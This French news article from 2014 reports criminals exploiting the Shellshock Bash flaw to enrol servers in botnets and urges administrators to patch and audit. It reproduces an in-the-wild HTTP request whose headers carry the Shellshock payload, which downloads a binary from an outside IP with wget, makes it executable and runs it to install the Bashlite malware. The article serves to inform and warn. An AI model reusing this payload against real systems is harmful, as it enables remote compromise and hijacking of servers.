Faille BASH alias ShellShock, les cybercriminels se régalent

Par:
fredericmazue

lun, 29/09/2014 - 16:11

Ca n'a bien sûr pas traîné. Les cybercriminels se sont rués sur la faille BASH, surnommée ShellShock ou encore Bashdoor, en laquelle ils ont vu une opportunité formidable d'enrôler des quantités de serveurs dans des botnets.

Un code malicieux est même publié sur GitHub. Un code inspiré par celui du chercheur en sécurité Robert Graham qui l'avait écrit pour estimer combien de serveurs sont vulnérables. Le code uploade sur la machine attaqué un malware du nom de Bashlite.

D'où le Thanks-Rob au début du code :

GET./.HTTP/1.0

.User-Agent:.Thanks-Rob

.Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;

.Host:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;

.Referer:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;

.Accept:.*/*

Un code pas très différent dans l'esprit de l'exemple que  nous avons donné dans notre avis d'expert afin de montrer qu'il n'est pas de serveur qui puisse être à l'abri d'attaque via cette faille tant que le BASH n'y est pas patché.

D'après, Thierry Karsenti, Directeur Technique Europe chez Check Point, les cybercriminels se régalent : "Tout le monde est en train de regarder ce qu’il peut faire avec cette arme qui est une véritable porte ouverte dans les systèmes d’informations y compris pour les gouvernements. On constate une forte progression de l’activité de scan de ports pour savoir quel matériel est vulnérable, un serveur, un routeur, des terminaux Android, etc."

Administrateurs système patchez vos serveurs de urgence si ce n'est pas déjà fait. Ensuite si vous avez tardé un peu pour patcher, un audit très rigoureux de vos serveurs s'impose.